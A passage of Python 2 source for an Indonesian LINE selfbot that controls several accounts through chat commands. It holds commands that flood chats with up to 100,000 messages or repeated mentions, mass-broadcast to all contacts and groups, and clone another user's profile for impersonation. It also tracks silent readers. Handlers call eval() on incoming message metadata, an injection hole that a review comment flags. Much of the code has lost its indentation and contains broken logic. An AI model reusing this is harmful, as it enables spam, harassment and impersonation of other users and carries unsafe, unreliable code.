kr1.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
#==========================[WIB]===========================
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif "cctv off" == msg.text.lower():
#if msg.from_ in admin:
if msg.to not in wait2['readPoint']:
kr1.sendText(msg.to,"Setpoint already off")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
kr1.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
#==========================[WIB]===========================
elif msg.text in ["toong","Ciduk"]:
#if msg.from_ in admin:
if msg.toType == 2:
print "\nRead aktif..."
if msg.to in wait2['readPoint']:
if wait2['ROM'][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2['ROM'][msg.to].items():
print rom
chiya += rom[1] + "\n"
kr1.sendText(msg.to, "╔═════════════ \n╠❂➣Sider :\n╠═════════════ %s\n╠\n╠═════════════\n╠❂➣Reader :\n╠═════════════ %s\n╠\n╠═════════════\n╠In the last seen point:\n╠[%s]\n╚═════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "\nReading Point Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "toong ready"
kr1.sendText(msg.to, "Auto Read Point!!" + (wait2['setTime'][msg.to]))
else:
kr1.sendText(msg.to, "Ketik [Cctv on] dulu, baru ketik [Toong]")
#==========================[WIB]===========================
# NOTE(review): duplicate of the earlier "Oswib" branch -- this elif is unreachable.
elif msg.text in ["Oswib"]:
    random.choice(KAC).sendImageWithURL(msg.to)
    random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif "intip" == msg.text.lower():
    # Report who has read messages since the read point was set, as mentions.
    #if msg.from_ in admin:
    if msg.to in wait2['readPoint']:
        if wait2['ROM'][msg.to].items() == []:
            kr1.sendText(msg.to, "Reader:\nNone")
        else:
            # Collect reader mids recorded in wait2['ROM'] for this chat.
            chiya = []
            for rom in wait2['ROM'][msg.to].items():
                chiya.append(rom[1])
            cmem = kr1.getContacts(chiya)
            zx = ""
            zxc = ""
            zx2 = []
            xpesan = ''
            # Build one "@a" placeholder per reader, tracking character
            # offsets (S/E) required by LINE's MENTION metadata.
            for x in range(len(cmem)):
                xname = str(cmem[x].displayName)
                pesan = ''
                pesan2 = pesan+"@a\n"
                xlen = str(len(zxc)+len(xpesan))
                xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
                zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
                zx2.append(zx)
                zxc += pesan2
            # Reuse the incoming message object as the outgoing mention message.
            msg.contentType = 0
            print zxc
            msg.text = xpesan+ zxc + "\nBefore: %s\nAfter: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
            lol ={"MENTION":str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
            print lol
            msg.contentMetadata = lol
            try:
                kr1.sendMessage(msg)
            except Exception as error:
                print error
                pass
    else:
        kr1.sendText(msg.to, "Lurking has not been set.")
#==========================[WIB]===========================
elif "Gbroadcast: " in msg.text:
    # Owner only: broadcast a text message to every joined group.
    if msg.from_ in owner:
        bc = msg.text.replace("Gbroadcast: ","")
        gid = kr1.getGroupIdsJoined()
        for i in gid:
            kr1.sendText(i, bc)
#==========================[WIB]===========================
elif "Cbroadcast: " in msg.text:
    # Owner only: broadcast a text message to every contact.
    if msg.from_ in owner:
        bc = msg.text.replace("Cbroadcast: ","")
        gid = kr1.getAllContactIds()
        for i in gid:
            kr1.sendText(i, bc)
#==========================[WIB]===========================
elif "Spam change: " in msg.text:
    # Admin: set the stored spam text.
    if msg.from_ in admin:
        wait['spam'] = msg.text.replace("Spam change: ","")
        kr1.sendText(msg.to,"spam changed")
#==========================[WIB]===========================
elif "Spam add: " in msg.text:
    # Admin: same as "Spam change:" but the reply depends on the language setting.
    if msg.from_ in admin:
        wait['spam'] = msg.text.replace("Spam add: ","")
        if wait["lang"] == "JP":
            kr1.sendText(msg.to,"spam changed")
        else:
            kr1.sendText(msg.to,"Done")
#==========================[WIB]===========================
elif "Spam: " in msg.text:
    # Admin: send the stored spam text N times.
    if msg.from_ in admin:
        strnum = msg.text.replace("Spam: ","")
        num = int(strnum)
        for var in range(0,num):
            kr1.sendText(msg.to, wait['spam'])
#==========================[WIB]===========================
elif "Spamtag @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={"MENTION":'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
else:
pass
#==========================[WIB]===========================
elif "Spam " in msg.text:
    # Admin: "Spam on <n> <text>" sends <text> n times as separate messages;
    # "Spam off <n> <text>" sends one message with <text> repeated n times.
    if msg.from_ in admin:
        txt = msg.text.split(" ")
        jmlh = int(txt[2])
        teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
        tulisan = jmlh * (teks+"\n")
        if txt[1] == "on":
            if jmlh <= 100000:
                for x in range(jmlh):
                    kr1.sendText(msg.to, teks)
            else:
                kr1.sendText(msg.to, "Out of Range!")
        elif txt[1] == "off":
            if jmlh <= 100000:
                kr1.sendText(msg.to, tulisan)
            else:
                kr1.sendText(msg.to, "Out Of Range!")
#==========================[WIB]===========================
elif ("Micadd " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
kr1.sendText(msg.to,"Target ditambahkan!")
break
except:
kr1.sendText(msg.to,"Fail !")
break
#==========================[WIB]===========================
elif ("Micdel " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
kr1.sendText(msg.to,"Target dihapuskan!")
break
except:
kr1.sendText(msg.to,"Fail !")
break
#==========================[WIB]===========================
elif msg.text in ["Miclist"]:
if msg.from_ in admin:
if mimic["target"] == {}:
kr1.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "?? "+kr1.getContact(mi_d).displayName + "\n"
kr1.sendText(msg.to,mc)
#==========================[WIB]===========================
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
kr1.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
kr1.sendText(msg.to,"Mimic change to target")
else:
kr1.sendText(msg.to,"I dont know")
#==========================[WIB]===========================
elif "Mimic " in msg.text:
if msg.from_ in admin:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
kr1.sendText(msg.to,"Reply Message on")
else:
kr1.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
kr1.sendText(msg.to,"Reply Message off")
else:
kr1.sendText(msg.to,"Sudah off")
#==========================[WIB]===========================
elif "Setimage: " in msg.text:
    # Admin: store an image URL for the "pap" commands.
    if msg.from_ in admin:
        wait['pap'] = msg.text.replace("Setimage: ","")
        kr1.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim",'pap']:
    # Admin: send the stored URL as an image.
    if msg.from_ in admin:
        kr1.sendImageWithURL(msg.to,wait['pap'])
elif "Setvideo: " in msg.text:
    # Admin: store a video URL (shares the same wait['pap'] slot as images).
    if msg.from_ in admin:
        wait['pap'] = msg.text.replace("Setvideo: ","")
        kr1.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
    # Admin: send the stored URL as a video.
    if msg.from_ in admin:
        kr1.sendVideoWithURL(msg.to,wait['pap'])
elif "TL:" in msg.text:
    # Admin, group chats only: create a timeline post and reply with its URL.
    if msg.from_ in admin:
        if msg.toType == 2:
            tl_text = msg.text.replace("TL:","")
            kr1.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+kr1.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#==========================[WIB]===========================
elif msg.text in ["mymid","Mymid"]:
    # Reply with the main bot's mid.
    kr1.sendText(msg.to,mid)
#==========================[WIB]===========================
elif "Timeline: " in msg.text:
    # Admin: same as "TL:" but works in any chat type.
    if msg.from_ in admin:
        tl_text = msg.text.replace("Timeline: ","")
        kr1.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+kr1.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#==========================[WIB]===========================
elif "Namebot: " in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Namebot: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr1.getProfile()
profile.displayName = string
kr1.updateProfile(profile)
kr1.sendText(msg.to,"Changed " + string + "")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr2.getProfile()
profile.displayName = string
kr2.updateProfile(profile)
kr2.sendText(msg.to,"Changed " + string + "")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr3.getProfile()
profile.displayName = string
kr3.updateProfile(profile)
kr3.sendText(msg.to,"Changed " + string + "")
#==========================[WIB]===========================
elif "Namebot1: " in msg.text:
    # Owner only: rename only bot 1 (kr1).
    if msg.from_ in owner:
        string = msg.text.replace("Namebot1: ","")
        # NOTE(review): this length guard (<= 10000000000) can never fail.
        if len(string.decode('utf-8')) <= 10000000000:
            profile = kr1.getProfile()
            profile.displayName = string
            kr1.updateProfile(profile)
            kr1.sendText(msg.to,"Changed " + string + "")
elif "Namebot2: " in msg.text:
    # Owner only: rename only bot 2 (kr2).
    if msg.from_ in owner:
        string = msg.text.replace("Namebot2: ","")
        if len(string.decode('utf-8')) <= 10000000000:
            profile = kr2.getProfile()
            profile.displayName = string
            kr2.updateProfile(profile)
            kr2.sendText(msg.to,"Changed " + string + "")
elif "Namebot3: " in msg.text:
    # Owner only: rename only bot 3 (kr3).
    if msg.from_ in owner:
        string = msg.text.replace("Namebot3: ","")
        if len(string.decode('utf-8')) <= 10000000000:
            profile = kr3.getProfile()
            profile.displayName = string
            kr3.updateProfile(profile)
            kr3.sendText(msg.to,"Changed " + string + "")
#==========================[WIB]===========================
elif "Biobot: " in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Biobot: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr1.getProfile()
profile.statusMessage = string
kr1.updateProfile(profile)
kr1.sendText(msg.to,"Changed " + string)
if len(string.decode('utf-8')) <= 10000000000:
profile = kr2.getProfile()
profile.statusMessage = string
kr2.updateProfile(profile)
kr2.sendText(msg.to,"Changed " + string)
if len(string.decode('utf-8')) <= 10000000000:
profile = kr3.getProfile()
profile.statusMessage = string
kr3.updateProfile(profile)
kr3.sendText(msg.to,"Changed " + string)
#==========================[WIB]===========================
elif msg.text in ["Myname"]:
h = kr1.getContact(mid)
kr1.sendText(msg.to,"═══[DisplayName]═══\n" + h.displayName)
elif msg.text in ["Mybot"]:
h = kr1.getContact(mid)
h = kr2.getContact(Amid)
h = kr3.getContact(Bmid)
kr1.sendText(msg.to,"═══[DisplayName]═══\n" + h.displayName)
kr2.sendText(msg.to,"═══[DisplayName]═══\n" + h.displayName)
kr3.sendText(msg.to,"═══[DisplayName]═══\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = kr1.getContact(mid)
kr1.sendText(msg.to,"═══[StatusMessage]═══\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = kr1.getContact(mid)
kr1.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = kr1.getContact(mid)
kr1.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = kr1.getContact(mid)
kr1.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif msg.text in ["Mycover"]:
h = kr1.getContact(mid)
cu = kr1.channel.getCover(mid)
path = str(cu)
kr1.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = kr1.getContact(mid)
cu = kr1.channel.getCover(mid)
path = str(cu)
kr1.sendText(msg.to, path)
#==========================[WIB]===========================
elif msg.text in ["Intip on","intip on"]:
if msg.from_ in admin:
try:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
wait["Sider"] == True
kr1.sendText(msg.to,"Cek yang ngintip on..!!!")
elif msg.text in ["Intip off","intip off"]:
if msg.from_ in admin:
if msg.to in cctv['point']:
cctv['cyduk'][msg.to]=False
wait["Sider"] = False
kr1.sendText(msg.to,"Cek yang ngintip off")
else:
kr1.sendText(msg.to,"Belum Di Set Boss")
#==========================[WIB]===========================
elif msg.text in ["Ciduk on","toong on"]:
#if msg.from_ in admin:
try:
del ngintip['target'][msg.to]
del ngintip['toong'][msg.to]
del ngintip['intip'][msg.to]
except:
pass
ngintip['target'][msg.to] = msg.id
ngintip['toong'][msg.to] = ""
ngintip['intip'][msg.to]=True
wait["intipp"] == True
kr1.sendText(msg.to,"Cek yang Cctv on..!!!")
elif msg.text in ["Ciduk off","toong off"]:
#if msg.from_ in admin:
if msg.to in ngintip['target']:
ngintip['intip'][msg.to]=False
wait["intipp"] = False
kr1.sendText(msg.to,"Cek yang Cctv off")
else:
kr1.sendText(msg.to,"Belum Di Set Boss")
#==========================[WIB]===========================
elif "Getmid @" in msg.text:
    # Look up a group member by display name and reply with their mid.
    #if msg.from_ in admin:
    _name = msg.text.replace("Getmid @","")
    _nametarget = _name.rstrip(' ')
    gs = kr1.getGroup(msg.to)
    for g in gs.members:
        if _nametarget == g.displayName:
            kr1.sendText(msg.to, g.mid)
        else:
            pass
elif "Getinfo" in msg.text:
    # Reply with name/mid/bio/avatar/cover of the first mentioned user.
    # NOTE(review): eval() on message metadata executes attacker-controlled
    # input -- unsafe; should be json.loads. Flagged, not changed here.
    #if msg.from_ in admin:
    key = eval(msg.contentMetadata["MENTION"])
    key1 = key["MENTIONEES"][0]["M"]
    contact = kr1.getContact(key1)
    cu = kr1.channel.getCover(key1)
    try:
        kr1.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
    except:
        kr1.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
    # Reply with the mentioned user's status message.
    #if msg.from_ in admin:
    key = eval(msg.contentMetadata["MENTION"])
    key1 = key["MENTIONEES"][0]["M"]
    contact = kr1.getContact(key1)
    cu = kr1.channel.getCover(key1)
    try:
        kr1.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
    except:
        kr1.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Getname" in msg.text:
    # Reply with the mentioned user's display name.
    #if msg.from_ in admin:
    key = eval(msg.contentMetadata["MENTION"])
    key1 = key["MENTIONEES"][0]["M"]
    contact = kr1.getContact(key1)
    cu = kr1.channel.getCover(key1)
    try:
        kr1.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
    except:
        kr1.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
    # Send the mentioned user's name/bio plus avatar and cover images.
    #if msg.from_ in admin:
    key = eval(msg.contentMetadata["MENTION"])
    key1 = key["MENTIONEES"][0]["M"]
    contact = kr1.getContact(key1)
    cu = kr1.channel.getCover(key1)
    path = str(cu)
    image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
    try:
        kr1.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
        kr1.sendText(msg.to,"Profile Picture " + contact.displayName)
        kr1.sendImageWithURL(msg.to,image)
        kr1.sendText(msg.to,"Cover " + contact.displayName)
        kr1.sendImageWithURL(msg.to,path)
    except:
        pass
elif "Getcontact" in msg.text:
    # Forward the mentioned user's contact card (contentType 13).
    #if msg.from_ in admin:
    key = eval(msg.contentMetadata["MENTION"])
    key1 = key["MENTIONEES"][0]["M"]
    mmid = kr1.getContact(key1)
    msg.contentType = 13
    msg.contentMetadata = {"mid": key1}
    kr1.sendMessage(msg)
elif "Getpict @" in msg.text:
    # Send the named group member's profile picture as an image.
    #if msg.from_ in admin:
    print "[Command]dp executing"
    _name = msg.text.replace("Getpict @","")
    _nametarget = _name.rstrip(' ')
    gs = kr1.getGroup(msg.to)
    targets = []
    for g in gs.members:
        if _nametarget == g.displayName:
            targets.append(g.mid)
    if targets == []:
        kr1.sendText(msg.to,"Contact not found")
    else:
        for target in targets:
            try:
                contact = kr1.getContact(target)
                path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
                kr1.sendImageWithURL(msg.to, path)
            except Exception as e:
                raise e
    print "[Command]dp executed"
elif "Getvid @" in msg.text:
    # Send the named group member's profile picture as a video.
    #if msg.from_ in admin:
    print "[Command]dp executing"
    _name = msg.text.replace("Getvid @","")
    _nametarget = _name.rstrip(' ')
    gs = kr1.getGroup(msg.to)
    targets = []
    for g in gs.members:
        if _nametarget == g.displayName:
            targets.append(g.mid)
    if targets == []:
        kr1.sendText(msg.to,"Contact not found")
    else:
        for target in targets:
            try:
                contact = kr1.getContact(target)
                path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
                kr1.sendVideoWithURL(msg.to, path)
            except Exception as e:
                raise e
    print "[Command]dp executed"
elif "Picturl @" in msg.text:
    # Reply with the named group member's profile-picture URL.
    #if msg.from_ in admin:
    print "[Command]dp executing"
    _name = msg.text.replace("Picturl @","")
    _nametarget = _name.rstrip(' ')
    gs = kr1.getGroup(msg.to)
    targets = []
    for g in gs.members:
        if _nametarget == g.displayName:
            targets.append(g.mid)
    if targets == []:
        kr1.sendText(msg.to,"Contact not found")
    else:
        for target in targets:
            try:
                contact = kr1.getContact(target)
                path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
                kr1.sendText(msg.to, path)
            except Exception as e:
                raise e
    print "[Command]dp executed"
elif "Getcover @" in msg.text:
    # Send the named group member's cover image.
    #if msg.from_ in admin:
    print "[Command]cover executing"
    _name = msg.text.replace("Getcover @","")
    _nametarget = _name.rstrip(' ')
    gs = kr1.getGroup(msg.to)
    targets = []
    for g in gs.members:
        if _nametarget == g.displayName:
            targets.append(g.mid)
    if targets == []:
        kr1.sendText(msg.to,"Contact not found")
    else:
        for target in targets:
            try:
                contact = kr1.getContact(target)
                cu = kr1.channel.getCover(target)
                path = str(cu)
                kr1.sendImageWithURL(msg.to, path)
            except Exception as e:
                raise e
    print "[Command]cover executed"
elif "Coverurl @" in msg.text:
    # Reply with the named group member's cover-image URL.
    #if msg.from_ in admin:
    print "[Command]cover executing"
    _name = msg.text.replace("Coverurl @","")
    _nametarget = _name.rstrip(' ')
    gs = kr1.getGroup(msg.to)
    targets = []
    for g in gs.members:
        if _nametarget == g.displayName:
            targets.append(g.mid)
    if targets == []:
        kr1.sendText(msg.to,"Contact not found")
    else:
        for target in targets:
            try:
                contact = kr1.getContact(target)
                cu = kr1.channel.getCover(target)
                path = str(cu)
                kr1.sendText(msg.to, path)
            except Exception as e:
                raise e
    print "[Command]cover executed"
elif "Getgrup image" in msg.text:
    # Send the current group's picture as an image.
    #if msg.from_ in admin:
    group = kr1.getGroup(msg.to)
    path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
    kr1.sendImageWithURL(msg.to,path)
elif "Urlgrup image" in msg.text:
    # Reply with the current group's picture URL.
    #if msg.from_ in admin:
    group = kr1.getGroup(msg.to)
    path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
    kr1.sendText(msg.to,path)
#==========================[WIB]===========================
elif "Mycopy @" in msg.text:
    # Admin: clone the named group member's profile onto the main bot.
    if msg.from_ in admin:
        print "[COPY] Ok"
        _name = msg.text.replace("Mycopy @","")
        _nametarget = _name.rstrip(' ')
        gs = kr1.getGroup(msg.to)
        targets = []
        for g in gs.members:
            if _nametarget == g.displayName:
                targets.append(g.mid)
        if targets == []:
            kr1.sendText(msg.to, "Not Found...")
        else:
            for target in targets:
                try:
                    kr1.CloneContactProfile(target)
                    kr1.sendText(msg.to, "Copied.")
                except Exception as e:
                    print e
elif msg.text in ["Mybackup","mybackup"]:
    # Admin: restore the bot's own profile from the saved backup object.
    if msg.from_ in admin:
        try:
            kr1.updateDisplayPicture(backup.pictureStatus)
            kr1.updateProfile(backup)
            kr1.sendText(msg.to, "Refreshed.")
        except Exception as e:
            kr1.sendText(msg.to, str(e))
#==============================================================================#
elif "Testext: " in msg.text:
    # Admin: send the text via the "kedapkedip" (flashing-text) helper.
    if msg.from_ in admin:
        txt = msg.text.replace("Testext: ", "")
        kr1.kedapkedip(msg.to,txt)
        print "[Command] Kedapkedip"
#==========================[WIB]===========================
elif "Translate-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
kr1.sendText(msg.to, A)
elif "Translate-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
kr1.sendText(msg.to, A)
elif "Translate-ar" in msg.text:
isi = msg.text.replace("Tr-ar ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
A = A.encode('utf-8')
kr1.sendText(msg.to, A)
elif "Translate-jp" in msg.text:
isi = msg.text.replace("Tr-jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
kr1.sendText(msg.to, A)
elif "Translate-ko" in msg.text:
isi = msg.text.replace("Tr-ko ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
kr1.sendText(msg.to, A)
elif msg.text in ["Oswib"]:
    # NOTE(review): unreachable duplicate of the earlier "Oswib" branch.
    random.choice(KAC).sendImageWithURL(msg.to)
    random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
# The following branches all translate by scraping the Google Translate
# mobile page: build the m?sl=..&tl=.. URL, fetch it with a desktop UA,
# and extract the text inside the 'class="t0">' span.
elif "Id@en" in msg.text:
    # Indonesian -> English.
    bahasa_awal = 'id'
    bahasa_tujuan = 'en'
    kata = msg.text.replace("Id@en ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO ENGLISH**\n" + "" + result + "\n**SUKSES**")
elif "En@id" in msg.text:
    # English -> Indonesian.
    bahasa_awal = 'en'
    bahasa_tujuan = 'id'
    kata = msg.text.replace("En@id ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"**FROM EN**\n" + "" + kata + "\n**TO ID**\n" + "" + result + "\n**SUKSES**")
elif "Id@jp" in msg.text:
    # Indonesian -> Japanese.
    bahasa_awal = 'id'
    bahasa_tujuan = 'ja'
    kata = msg.text.replace("Id@jp ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO JP**\n" + "" + result + "\n**SUKSES**")
elif "Jp@id" in msg.text:
    # Japanese -> Indonesian.
    bahasa_awal = 'ja'
    bahasa_tujuan = 'id'
    kata = msg.text.replace("Jp@id ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@th" in msg.text:
    # Indonesian -> Thai.
    bahasa_awal = 'id'
    bahasa_tujuan = 'th'
    kata = msg.text.replace("Id@th ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----")
elif "Th@id" in msg.text:
    # Thai -> Indonesian.
    bahasa_awal = 'th'
    bahasa_tujuan = 'id'
    kata = msg.text.replace("Th@id ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
# NOTE(review): unreachable duplicate -- "Id@jp" is already handled above.
elif "Id@jp" in msg.text:
    bahasa_awal = 'id'
    bahasa_tujuan = 'ja'
    kata = msg.text.replace("Id@jp ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ar" in msg.text:
    # Indonesian -> Arabic.
    bahasa_awal = 'id'
    bahasa_tujuan = 'ar'
    kata = msg.text.replace("Id@ar ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    kr1.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----")
elif "Ar@id" in msg.text:
    # Arabic -> Indonesian.
    bahasa_awal = 'ar'
